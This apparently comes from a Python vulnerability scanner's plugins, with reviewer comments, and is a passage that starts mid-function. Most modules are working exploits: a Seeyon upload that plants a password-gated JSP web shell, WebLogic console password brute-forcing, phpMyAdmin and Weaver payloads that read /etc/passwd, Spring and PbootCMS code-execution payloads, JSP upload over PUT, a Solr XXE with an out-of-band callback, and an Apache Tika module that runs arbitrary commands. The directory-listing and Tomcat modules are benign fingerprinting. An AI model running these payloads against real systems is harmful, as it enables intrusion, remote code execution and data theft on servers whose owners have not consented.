                         data = '''DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2'''
                         # NOTE(review): ``response`` is rebound here, shadowing the GET response above.
                         async with session.post(url=url,
                                                 data=data) as response:
                             # Fixed grace period before checking whether the file landed.
                             await asyncio.sleep(1)
                         url1 = self.base_url + 'seeyon/' + test_file
                         async with session.get(url=url1) as response1:
                             if response1 != None:
                                 text1 = await response1.text()
                                 # The uploaded page prints ':-)' when called without parameters.
                                 if ':-)' in text1:
                                     self.flag = 1
                                     self.res.append({
                                         "info":
                                         url1 + '?pwd=test12345&cmd=whoami',
                                         "key":
                                         'seeyon getshell'
                                     })
 async def prove(self):
     """WebLogic console credential-guessing check against ``console/j_security_check``.

     Username and password candidates come from ``self.parameter['U']`` /
     ``['P']`` when given, otherwise from ``weblogic_usernames.txt`` /
     ``weblogic_passwords.txt`` under ``paths.DICT_PATH``; pairs are produced
     by ``self.generate_dict``. A POST answered with 302 whose ``Location``
     contains ``/console`` but not ``/login/LoginForm.jsp`` is treated as a
     valid login: sets ``self.flag = 1``, records ``username/password`` in
     ``self.res`` and returns after the first hit. Requires ``self.base_url``.
     """
     await self.get_url()
     if self.base_url:
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         # NOTE(review): ``'U' in self.parameter`` is the idiomatic form of ``.keys()``.
         usernamedic = self.read_file(
             self.parameter['U']) if 'U' in self.parameter.keys(
             ) else self.read_file(
                 os.path.join(paths.DICT_PATH, 'weblogic_usernames.txt'))
         passworddic = self.read_file(
             self.parameter['P']) if 'P' in self.parameter.keys(
             ) else self.read_file(
                 os.path.join(paths.DICT_PATH, 'weblogic_passwords.txt'))
         url = self.base_url + 'console/j_security_check'
         async with ClientSession() as session:
             async for (username, password) in self.generate_dict(
                     usernamedic,
                     passworddic):  #    too many failed logins lock the account; do not try many -- fewer than five is about right
                 # NOTE(review): values are interpolated without URL-encoding, so a
                 # credential containing '&', '=' or '%' corrupts the form body.
                 data = 'j_username={}&j_password={}&j_character_encoding=UTF-8'.format(
                     username, password)
                 async with session.post(url=url,
                                         data=data,
                                         headers=headers,
                                         allow_redirects=False) as res:
                     # Redirects are not followed so the Location header can be inspected.
                     if res != None and res.status == 302:
                         location = res.headers.get('Location', '')
                         # A redirect back to the login form means the attempt failed.
                         if '/console' in location and '/login/LoginForm.jsp' not in location:
                             # if ('Home Page' in text or 'WebLogic Server Console' in text and 'console.portal' in text):
                             self.flag = 1
                             self.res.append({
                                 "info": username + "/" + password,
                                 "key": "weblogic burst"
                             })
                             return
 async def prove(self):
     """phpMyAdmin ``scripts/setup.php`` deserialization / local-file-read probe.

     For each candidate base path (``./phpMyAdmin/``, ``./pma/``,
     ``/phpmyadmin/``, ``./`` resolved through ``self.url_normpath``) POSTs two
     ``configuration`` bodies, one naming ``/etc/passwd`` and one ``win.ini``.
     A response containing ``root:`` or ``[extensions]`` is taken as the file
     having been read back: sets ``self.flag = 1``, records the URL under key
     ``phpmyadmin_setup_deserialization`` and returns. Requires ``self.base_url``.
     """
     await self.get_url()
     if self.base_url:
         headers = {"Content-Type": "application/x-www-form-urlencoded"}
         async with ClientSession() as session:
             # NOTE(review): '/phpmyadmin/' is absolute while the others are relative;
             # confirm url_normpath resolves a leading '/' the intended way.
             for path in self.url_normpath(self.url, [
                     './phpMyAdmin/',
                     './pma/',
                     '/phpmyadmin/',
                     './',
             ]):
                 url = path + 'scripts/setup.php'
                 # One Linux and one Windows file path, each wrapped in a serialized PMA_Config.
                 datas = [
                     'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}',
                     'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:18:"C:\\Windows\\win.ini";}'
                 ]
                 for data in datas:
                     async with session.post(url=url,
                                             headers=headers,
                                             data=data,
                                             allow_redirects=False) as res:
                         if res:
                             text = await res.text()
                             # Indicators: passwd entries ('root:') or a win.ini section header.
                             if 'root:' in text or '[extensions]' in text:
                                 self.flag = 1
                                 self.res.append({
                                     "info":
                                     url,
                                     "key":
                                     "phpmyadmin_setup_deserialization"
                                 })
                                 return
 async def prove(self):
     """Spring Data REST PATCH probe (key ``Spring RCE CVE-2017-8046``).

     Sends two ``application/json-patch+json`` bodies whose ``path`` is a SpEL
     ``T(java.lang.Runtime)`` expression to each candidate base path (root,
     ``./`` and the bare URL via ``self.url_normpath``, de-duplicated). A body
     containing ``SpelEvaluation`` is taken as the expression having been
     evaluated: sets ``self.flag = 1`` and records the path in ``self.res``.
     Requires ``self.base_url``.
     """
     await self.get_url()
     if self.base_url:
         # set() drops duplicate candidates; iteration order is then arbitrary.
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.url, './'),
                 self.url_normpath(self.url, '')
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 headers = {
                     "Content-Type": "application/json-patch+json",
                 }
                 # Two variants that differ only in how the trailing segment is written.
                 datas = [
                     '[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))/foo"}]',
                     '[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))[foo]"}]'
                 ]
                 for _data in datas:
                     async with session.patch(url=path,
                                              data=_data,
                                              headers=headers) as res:
                         if res:
                             text = await res.text()
                             # Indicator: presumably a SpEL evaluation exception name in the
                             # error body -- confirm against a real response.
                             if "SpelEvaluation" in text:
                                 self.flag = 1
                                 self.res.append({
                                     "info":
                                     path,
                                     "key":
                                     "Spring RCE CVE-2017-8046"
                                 })
                                 # NOTE(review): leaves only the inner loop; the remaining
                                 # paths are still probed and may append a second entry.
                                 break
    async def prove(self):
        """PbootCMS template-tag injection probe (key ``pbootcms v1.3.2 rec``).

        Requests a set of ``index.php/...?keyword={pboot:if(...)}`` URLs under
        each candidate base path and treats a body containing ``php.ini`` as a
        positive (``phpinfo()`` output): sets ``self.flag = 1``, records the
        URL in ``self.req`` and ``self.res``, then stops probing that path.
        Requires ``self.base_url``.
        """
        await self.get_url()
        if self.base_url:
            path_list = list(set([
                self.url_normpath(self.base_url, '/'),
                self.url_normpath(self.base_url, '../PbootCMS/'),
                self.url_normpath(self.url, 'PbootCMS/'),
                self.url_normpath(self.url, '../PbootCMS/'),
            ]))

            async with ClientSession() as session:
                for path in path_list:
                    # NOTE(review): the first two literals below have no comma between
                    # them, so Python concatenates them into a single element -- the
                    # list has five entries and that combined URL is malformed.
                    for poc in [
                        "index.php/index/index?keyword={pboot:if(eval($_REQUEST[1]));//)})}}{/pboot:if}&1=phpinfo();"
                        "index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
                        "index.php/Content/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
                        "index.php/List/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
                        "index.php/About/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo",
                        "index.php/Search/index?keyword={pboot:if(1)$a=$_GET[title];$a();//)})}}{/pboot:if}&title=phpinfo"
                    ]:
                        url = path + poc
                        async with session.get(url=url) as res:
                            if res !=None:
                                text = await res.text()
                                # 'php.ini' is taken as phpinfo() output having been rendered.
                                if "php.ini" in text:
                                    self.flag = 1
                                    self.req.append({"url": url})
                                    self.res.append({"info": url, "key": "pbootcms v1.3.2 rec"})
                                    # Leaves only the poc loop; other base paths are still tried.
                                    break
 async def prove(self):
     """HTTP PUT upload probe (destructive: writes files on a positive result).

     For each candidate base path (root and ``./``, de-duplicated) sends
     OPTIONS to ``<path>testbyme`` and, if the ``Allow`` header lists ``PUT``,
     PUTs the body ``'test'`` to three timestamp-named ``.jsp`` filename
     variants. A 201 or 204 answer marks a hit: sets ``self.flag = 1`` and
     records the URL under key ``PUT`` in ``self.res`` (``self.req`` notes the
     method). Requires ``self.base_url``.

     NOTE(review): files created by a positive result are never removed.
     """
     await self.get_url()
     if self.base_url != None:
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.url, './'),
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 async with session.options(url=path +
                                            "testbyme") as response:
                     # Substring test on Allow: any token containing 'PUT' passes.
                     if response != None and 'Allow' in response.headers and 'PUT' in response.headers[
                             'Allow']:
                         # NOTE(review): time.time() is evaluated separately per entry, so
                         # the three names need not share the same timestamp.
                         for _url in [
                                 str(int(time.time())) + '.jsp/',
                                 str(int(time.time())) + '.jsp::$DATA',
                                 str(int(time.time())) + '.jsp%20'
                         ]:
                             url = path + _url
                             # NOTE(review): ``response`` is rebound here, shadowing the OPTIONS response.
                             async with session.put(
                                     url=url, data='test') as response:
                                 if response != None:
                                     # 201 Created / 204 No Content: the server accepted the write.
                                     if response.status == 201 or response.status == 204:
                                         self.flag = 1
                                         self.req.append({"method": "put"})
                                         self.res.append({
                                             "info": url,
                                             "key": "PUT"
                                         })
 async def prove(self):
     """Apache Solr XML-parser external-entity probe (key ``CVE-2017-12629``).

     Queries ``admin/cores?wt=json`` under the base URL and under ``solr/``,
     takes the first ``"name":"..."`` value as a core name, then requests that
     core's ``select`` handler with a percent-encoded XML document declaring an
     external entity whose SYSTEM identifier is a unique callback URL from
     ``self.ceye_dns_api``. A positive ``self.ceye_verify_api(dns, 'http')`` is
     taken as the target having fetched the URL: sets ``self.flag = 1``, records
     the cores URL in ``self.res`` and returns. Requires ``self.base_url``.
     """
     await self.get_url()
     if self.base_url:
         async with ClientSession() as session:
             # NOTE(review): despite the name this is an HTTP callback URL (t='url')
             # and is verified on the 'http' channel below, not a DNS token.
             dns = self.ceye_dns_api(t='url')
             for path in [self.base_url, self.base_url + "solr/"]:
                 url = path + 'admin/cores?wt=json'
                 async with session.get(url=url,
                                        allow_redirects=False) as res:
                     if res and res.status == 200:
                         text = await res.text()
                         # 'responseHeader' presumably distinguishes a Solr JSON answer from an arbitrary 200 page.
                         if 'responseHeader' in text:
                             # First "name" value only; other cores are not tried.
                             matchObj = re.search(r'"name":"(?P<core>.*?)"',
                                                  text)
                             if matchObj:
                                 name = matchObj.group(1)
                                 url1 = path + name + '/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{dns}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser'.format(
                                     dns=dns)
                                 async with session.get(url=url1) as res1:
                                     # NOTE(review): res1 is only truth-tested; its body is never read.
                                     # Detection relies entirely on the out-of-band callback.
                                     if res1:
                                         if await self.ceye_verify_api(
                                                 dns, 'http'):
                                             self.flag = 1
                                             # NOTE(review): records the cores URL, not the select URL (url1) that triggered.
                                             self.res.append({
                                                 "info":
                                                 url,
                                                 "key":
                                                 "CVE-2017-12629"
                                             })
                                             return
    async def prove(self):
        """Fetch ``self.url`` and flag it when the body contains any dictionary keyword.

        The dictionary is ``self.parameter['keyword']`` when supplied, else
        ``dict/web_content_key.txt``, read in binary via ``self.read_file``.
        The body is decoded as UTF-8, then GBK, else replaced by
        ``"[Error Code]"``; the ``<title>`` is taken from the lower-cased body.
        Every matching keyword sets ``self.flag = 1`` and is appended to a
        comma-separated list stored in ``self.res`` as
        ``{"info": title, "key": keys}``. Runs only when ``self.url`` is set.
        """
        await self.get_url()
        if self.url :
            async with ClientSession() as session:
                # read_file(..., 'rb'): entries arrive as bytes and are decoded per line below.
                webkeydic = self.read_file(self.parameter['keyword'],'rb') if 'keyword' in self.parameter.keys() else self.read_file('dict/web_content_key.txt', 'rb')
                async with session.get(url=self.url) as response:
                    if response is not None :
                        res = await response.read()
                        try:
                            res = str(res, 'utf-8')
                        except UnicodeDecodeError:
                            # NOTE(review): a failed GBK decode raises out of this handler; the
                            # sibling bare except below does NOT catch it.
                            res = str(res, 'gbk')
                        except:
                            res = "[Error Code]"
                        # NOTE(review): non-raw pattern containing '\/', an invalid escape Python
                        # warns about; '.*' is greedy, so several <title> tags merge into one match.
                        m = re.search('<title>(.*)<\/title>', res.lower())
                        if m != None and m.group(1):
                            title = m.group(1)
                        else:
                            title = '[None Title]'

                        key = ''
                        for searchkey in webkeydic:
                            # Decode the dictionary line and strip CR/LF.
                            searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "")
                            try:
                                # Case-sensitive match against the decoded (not lower-cased) body.
                                if searchkey in res:
                                    key += searchkey + ','
                                    self.flag = 1
                            except Exception as e:
                                # NOTE(review): a str-in-str test is unlikely to raise; this handler
                                # prints instead of logging and is effectively unreachable.
                                print(e)
                                pass

                        # key[:-1] drops the trailing comma.
                        if self.flag == 1:
                            self.res.append({"info": title, "key": key[:-1]})
    async def exec(self):
        """Apache Tika server command-execution check (key ``Apache Tika-server RCE``).

        PUTs a JScript snippet that runs ``cmd /c <self.parameter['cmd']>`` to
        ``<base_url>meta`` with ``X-Tika-OCR*`` headers naming ``cscript``. A
        body containing both ``X-Parsed-By`` and ``tika.parse`` marks a hit:
        sets ``self.flag = 1``, notes the URL in ``self.req`` and stores the raw
        response text in ``self.res``. Requires ``self.base_url`` and a ``cmd``
        entry in ``self.parameter`` (KeyError otherwise).
        """
        await self.get_url()
        if self.base_url:
            headers = {
                "X-Tika-OCRTesseractPath": "\"cscript\"",
                "X-Tika-OCRLanguage": "//E:Jscript",
                "Expect": "100-continue",
                "Content-type": "image/jp2",
                "Connection": "close"
            }

            url = self.base_url + "meta"
            # Leading whitespace inside the triple-quoted literal is part of the script body.
            jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
             var oExec = oShell.Exec('cmd /c {}');
             '''.format(self.parameter['cmd'])
            async with ClientSession() as session:
                async with session.put(url=url, headers=headers,
                                       data=jscript) as res:
                    if res != None:
                        text = await res.text()
                        # NOTE(review): ``res != None`` was already established above; redundant here.
                        if res != None and "X-Parsed-By" in text and "tika.parse" in text:
                            self.flag = 1
                            self.req.append({"flag": url})
                            self.res.append({
                                "info": text,
                                "key": "Apache Tika-server RCE"
                            })
 async def prove(self):
     """Detect an exposed directory listing at the site root, ``./`` or ``../``.

     GETs each de-duplicated candidate path and, on a 200, runs a fixed set of
     case-insensitive regexes for common auto-index markers over the body. The
     first match sets ``self.flag = 1``, records the URL under key
     ``directory_list`` and returns. Requires ``self.base_url``.
     """
     await self.get_url()
     if self.base_url:
         # Markers typical of various servers' auto-generated index pages.
         # NOTE(review): in the '"?C=N' and '"?M=A' patterns the '?' makes the preceding
         # quote optional instead of matching a literal '?', and '[To Parent Directory]'
         # is a character class, not literal text -- those three patterns likely never
         # match what was intended.
         PAYLOADS = (
             re.compile(r'<title>Index of /', re.I),
             re.compile(r'<a href="?C=N;O=D">Name</a>', re.I),
             re.compile(r'<A HREF="?M=A">Last modified</A>', re.I),
             re.compile(r'Last modified</a>', re.I),
             re.compile(r'Parent Directory</a>', re.I),
             re.compile(r'<TITLE>Folder Listing.', re.I),
             re.compile(r'<table summary="Directory Listing', re.I),
             re.compile(r'">[To Parent Directory]</a><br><br>', re.I),
             re.compile(r'&lt;dir&gt; <A HREF="/', re.I),
             re.compile(r'''<pre><A HREF="/">\[''', re.I),
         )
         async with ClientSession() as session:
             path_list = list(set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.url, './'),
                 self.url_normpath(self.url, '../'),
             ]))
             for path in path_list:
                 url = path
                 async with session.get(url=url) as response:
                     if response and response.status==200:
                         # NOTE(review): str() on bytes yields the "b'...'" repr, not decoded
                         # text; non-ASCII bytes become '\xNN' escapes. The ASCII markers
                         # above still match inside that repr.
                         text = str(await response.read())
                         for payload in PAYLOADS:
                             r = payload.findall(text)
                             if r:
                                 self.flag = 1
                                 self.res.append({"info": url, "key": "directory_list"})
                                 return
 async def prove(self):
     """Weaver e-bridge ``saveYZJFile`` local-file-read probe (key ``weaver e-bridge lfl``).

     Under each ``./`` base path GETs ``wxjsapi/saveYZJFile`` with a
     ``downloadUrl`` of ``file:///etc/passwd`` and then of ``win.ini``. A 200
     whose body mentions ``id``, ``filepath`` and ``name`` is parsed as JSON and
     its ``id`` used to fetch ``file/fileNoLogin/<id>``; a body containing
     ``[extensions]`` or ``root:x:`` is a hit: sets ``self.flag = 1``, records
     the download URL in ``self.req`` and the trigger URL in ``self.res``, and
     returns. Requires ``self.base_url``.
     """
     await self.get_url()
     if self.base_url:
         async with ClientSession() as session:
             for path in self.url_normpath(self.url, './'):
                 # One Linux and one Windows file reference.
                 pocs = [
                     "wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt",
                     "wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt"
                 ]
                 for poc in pocs:
                     url = path + poc
                     async with session.get(url=url) as res:
                         if res != None and res.status == 200:
                             text = await res.text()
                             # Cheap substring pre-check before parsing JSON.
                             # NOTE(review): json.loads still raises on a non-JSON body that
                             # happens to contain these three words.
                             if 'id' in text and 'filepath' in text and 'name' in text:
                                 file_id = json.loads(text).get('id', '')
                                 if file_id:
                                     # Second request retrieves the stored file by id (the path name
                                     # suggests no authentication is required -- not verified here).
                                     url2 = path + 'file/fileNoLogin/' + str(
                                         file_id)
                                     async with session.get(
                                             url=url2) as res2:
                                         if res2 != None and res2.status == 200:
                                             text2 = await res2.text()
                                             # Indicators: a win.ini section header or a passwd entry.
                                             if '[extensions]' in text2 or 'root:x:' in text2:
                                                 self.flag = 1
                                                 self.req.append(
                                                     {"url": url2})
                                                 self.res.append({
                                                     "info":
                                                     url,
                                                     "key":
                                                     "weaver e-bridge lfl"
                                                 })
                                                 return
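 async def prove(self):
     """Fingerprint Apache Tomcat default pages under the base URL.

     GETs the base URL and its ``docs/``, ``manager/``, ``examples/`` and
     ``host-manager/`` children. A response is a hit when its status and body
     satisfy one of the rules in ``fingerprints`` below; each hit sets
     ``self.flag = 1``, appends ``{"page": 'tomcat page'}`` to ``self.req`` and
     ``{"info": url, "key": "tomcat page"}`` to ``self.res``. At most one entry
     is recorded per URL and every URL is always visited. Does nothing when
     ``self.get_url()`` leaves ``self.base_url`` as ``None``.
     """
     await self.get_url()
     # ``is None`` replaces the original ``!= None``; equivalent for a str base_url.
     if self.base_url is None:
         return
     # (expected status, substrings that must all appear in the body). The four
     # formerly duplicated elif branches collapse into this table; the first
     # matching rule wins exactly as the elif chain did.
     fingerprints = (
         (200, ('Apache Tomcat Examples',)),
         (401, ('401 Unauthorized', 'tomcat')),
         (403, ('403 Access Denied', 'tomcat-users')),
         (200, ('Documentation', 'Apache Software Foundation', 'tomcat')),
     )
     candidates = [
         self.base_url,
         self.base_url + "docs/",
         self.base_url + "manager/",
         self.base_url + "examples/",
         self.base_url + "host-manager/",
     ]
     async with ClientSession() as session:
         for url in candidates:
             async with session.get(url=url) as res:
                 if not res:
                     continue
                 text = await res.text()
                 matched = any(
                     res.status == status and all(marker in text for marker in markers)
                     for status, markers in fingerprints
                 )
                 if matched:
                     self.flag = 1
                     self.req.append({"page": 'tomcat page'})
                     self.res.append({"info": url, "key": "tomcat page"})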